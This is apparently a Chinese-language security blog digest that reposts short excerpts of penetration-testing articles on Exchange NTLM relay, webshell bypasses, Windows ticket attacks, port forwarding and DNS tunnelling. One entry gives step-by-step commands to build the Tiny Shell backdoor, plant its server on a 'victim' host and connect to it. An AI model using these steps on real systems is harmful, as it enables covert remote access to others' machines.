歡迎光臨
我們一直在努力

利用INF Script下載執行技術來進行繞過,免殺和持久化

波波閱讀(1129)

原文地址:https://www.freebuf.com/column/164986.html

通過對MSDN上一些處理不同COM指令碼的調查和測試,結合網上的分享,我發現了一些有意思的東西,這些發現可能是遠端呼叫執行指令碼新方法。
其中最有意思的是LaunchINFSection。

這篇文章主要討論一下網上公開的利用INF Script的方法,並介紹下LaunchINFSection,最後再分享一些用法和作為防禦者應該注意的事項。另外,還會給出一些其他遠端執行指令碼方法的參考。

前言引用來源:https://www.freebuf.com/column/164986.html
文章圖片來源:https://www.freebuf.com/column/164986.html

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

Exchange CVE-2018-8581 補丁有用?沒用?

波波閱讀(839)

原文地址:https://mp.weixin.qq.com/s?__biz=MzI5Nzc0OTkxOQ==&mid=2247483837&idx=1&sn=34d3f9eb803f09a45586882f0c6c16e1

CVE-2018-8581 TL;DR

漏洞最早由 ZDI 披露,ZDI 發現的 PoC 裡面利用此漏洞實現了接管任意人的收件箱的效果。

原理比較簡單,該漏洞實質是由 SSRF (Server-Side Request Forgery:伺服器端請求偽造)漏洞和其他安全機制相結合造成的。Exchange 允許任何使用者為推送訂閱指定所需的 URL,伺服器將嘗試向這個 URL 傳送通知,此行為造成 SSRF 漏洞。且 Exchange 伺服器在向指定的 URL 傳送通知時,在需要的情況下Exchange 會自動向此 URL 進行 401 身份認證。認證的其中一種方式為NTLM 認證。且因為 Exchange 服務在與目標 URL 進行 401 認證時所使用的預設憑據為 CredentialCache.DefaultCredentials 且相關 Exchange 服務由 SYSTEM 賬號或 NETWORK SERVICE 賬號啟動, 所以攻擊者通過利用此 SSRF 漏洞,可以竊取 Exchange 伺服器的系統賬號憑據並伴隨利用 NTLM-RELAY 技術將此憑據重放至 Exchange 伺服器的 EWS 介面,從而獲得一個高許可權的 EWS 會話(所以此漏洞在微軟官方的通告裡面被描述為 ”Microsoft Exchange Server Elevation of Privilege Vulnerability“)。該高許可權的會話允許攻擊者在後續訪問 EWS 介面時模擬成任何使用者,並最終可以接收到任何使用者今後所接收到的任何郵件。

前言引用來源:https://mp.weixin.qq.com/s?__biz=MzI5Nzc0OTkxOQ==&mid=2247483837&idx=1&sn=34d3f9eb803f09a45586882f0c6c16e1
文章圖片來源:http://www.micromail.com/microsoft-exchange-server-2013/ms0001pd.html

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

RDP蜜罐:中間人技術的實踐

波波閱讀(969)

原文地址:https://nosec.org/home/detail/2093.html

在這篇文章中,作者將展示最新開發的開源項目PyRDP(https://github.com/gosecure/pyrdp),它既可以當作MITM,也可以用作研究RDP協議的程式碼庫之一。作者將通過描述蜜罐所捕獲的惡意使用者的惡意行為來演示以下兩個用例。

前言引用來源:https://nosec.org/home/detail/2093.html
文章圖片來源:https://nosec.org/home/detail/2093.html

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

無需sendmail:巧用LD_PRELOAD突破disable_functions

波波閱讀(1308)

原文地址:https://www.freebuf.com/articles/web/192052.html

摘要:千辛萬苦拿到的 webshell 居然無法執行系統命令,懷疑服務端 disable_functions 禁用了命令執行函數,通過環境變數 LD_PRELOAD 劫持系統函數,卻又發現目標根本沒安裝 sendmail,無法執行命令的 webshell 是無意義的,看作者如何突破!

前言引用來源:https://www.freebuf.com/articles/web/192052.html
文章圖片來源:https://www.freebuf.com/articles/web/192052.html

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

Payloads All The Things

波波閱讀(986)

原文地址:https://github.com/swisskyrepo/PayloadsAllTheThings

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

前言引用來源:https://github.com/swisskyrepo/PayloadsAllTheThings
文章圖片來源:https://github.com/swisskyrepo/PayloadsAllTheThings

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

內網滲透常見端口轉發方式

波波閱讀(1043)

原文地址:https://payloads.online/archivers/2018-02-02/1

由於在內網滲透的過程中面對的網路環境都是千奇百怪的,我們需要探測連線情況。

需要使用到端口轉發技術來讓我們訪問到內網其他主機中,或者將內網中某個端口轉發到本地。

端口對映 : 端口對映是將一臺主機的內網(LAN)IP地址對映成一個公網(WAN)IP地址,當用戶訪問提供對映端口主機的某個端口時,伺服器將請求轉移到本地區域網內部提供這種特定服務的主機;

前言引用來源:https://payloads.online/archivers/2018-02-02/1
文章圖片來源:https://payloads.online/archivers/2018-02-02/1

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

徹底理解Windows認證 - 議題解讀

波波閱讀(930)

原文地址:https://payloads.online/archivers/2018-11-30/1

本次議題圍繞著Windows認證分別講解了:

Pass The Hash
Silver Tickets、Golden Tickets、
Impersonation Token
這些技術分別能夠滿足我們在滲透中持續的維持許可權、提權。

前言引用來源:https://payloads.online/archivers/2018-11-30/1
文章圖片來源:https://payloads.online/archivers/2018-11-30/1

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

隧道技術之DNS和ICMP與其檢測防禦

波波閱讀(953)

原文出處:https://www.anquanke.com/post/id/163240

簡述
為了逃避監測,繞過殺軟,更好的隱藏自身,很多木馬的傳輸層都使用了隧道技術,那什麼是隧道技術(我是誰)?其傳輸有什麼特點(我從哪裡來)?隧道技術的現狀是怎樣的呢(我到那裡去)?連問三連擊:)

隧道技術(Tunneling):是一種通過使用網際網路絡的基礎設施在網路之間傳遞資料的方式,使用隧道傳遞的Data(資料)或 Payload (負載)可以是不同協議的資料幀或包。隧道協議將其它協議的資料幀或包,重新封裝然後通過隧道傳送,新的幀頭,提供路由資訊,以便通過網際網路傳遞被封裝的 Payload。

資料傳輸特點(Feature):不通過網路直接傳送資料包,通過封裝技術在另一個(通常是加密的)連線中傳送資料。

現狀:傳統socket隧道已極少,TCP、UDP 大量被防禦系統攔截,DNS、ICMP、http/https 等難於禁止的協議已成為黑客控制隧道的主流。

上面我們瞭解了隧道技術,不知你是否會好奇 DNS 隧道為什麼會有那麼強大?一方面是因為 DNS 報文具有天然的穿透防火牆的能力;另一方面,目前的防毒軟體、IDS 等安全策略很少對 DNS 報文進行有效的監控管理:)接下來我們來回顧下這樣幾個典型的攻擊事件中用到的隧道木馬的特點。

文章圖片來源:https://www.anquanke.com/post/id/163240
前言引用來源:https://www.anquanke.com/post/id/163240

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

Tiny Shell後門紀錄與教學

波波閱讀(1894)

Tiny Shell 是一款開源的Unix類後門shell工具,由C語言編寫,體積小(在kali系統上編譯後只有55K大小)。
分為客戶端和服務端,支援正向連線模式(即服務端在遠端執行,使用者遠端直接連結),和反彈連線模式(使用者在自己伺服器監聽,服務端連結監聽埠)

功能:
通訊加密
支援上傳、下載、直接反彈shell

系統環境 CentOS 7
安裝 gcc & make
用 YUM 安裝 “Development Tools” 就會自動安裝所有需要的套件。
#yum group install "Development Tools"

安裝gcc編譯器 (可以編譯C程式) #yum install gcc
安裝g++ (安裝後才可以編譯C++程式) #yum install gcc-c++
安裝make命令#yum install make
安裝wget命令 #yum install wget

#git clone https://github.com/orangetw/tsh.git
#cd tsh
編輯tsh.h檔案
#vi tsh.h

更改密碼&Port等,詳細參考 短小精干的Unix类后门Tiny shell的使用与分析

更改完畢後,make linux,會產生tsh會tshd兩個檔案。
在受害者端 放上tshd檔案,並賦予權限後執行
#chmod +x tshd & #./tshd
在主控端賦予tsh檔案權限後執行
#chmod +x tsh & #./tsh 受害者端IP

CentOS 7 安裝gcc教學:https://www.phpini.com/linux/rhel-centos-linux-install-gcc

CentOS 7 安裝make教學:https://my.oschina.net/u/1028135/blog/515889

Tiny Shell教學介紹:https://www.freebuf.com/sectool/138350.html

Tiny Shell:https://github.com/orangetw/tsh

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

滲透基礎——端口轉發與代理

波波閱讀(1033)

原文出處:https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E4%B8%8E%E4%BB%A3%E7%90%86/

在滲透測試中,經常會使用到端口轉發和代理。

端口轉發是轉發一個網路埠從一個網路節點到另一個網路節點的行為。

實際應用中需要考慮兩種情況:

Client->Transit server->Server:Client能夠正向連線Transit server。Transit server直接轉發即可
Client<-Transit server->Server:Client無法正向連線Transit server,但Transit server能夠反向連線Client。
如果Client要對Server的多個端口進行掃描(或是多個Server的多個埠),逐個配置轉發規則很不現實。

為了提高效率,這裡可以使用代理,配置一次規則即可。

本文將對常用方法和工具進行整理總結,分門別類,區分正向和反向連線,區分轉發和代理,分析其中的聯絡和區別,並給出應用場景,以作參考。

文章圖片來源:https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E4%B8%8E%E4%BB%A3%E7%90%86/
前言引用來源:https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E4%B8%8E%E4%BB%A3%E7%90%86/

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

波波的寂寞世界

Facebook聯繫我們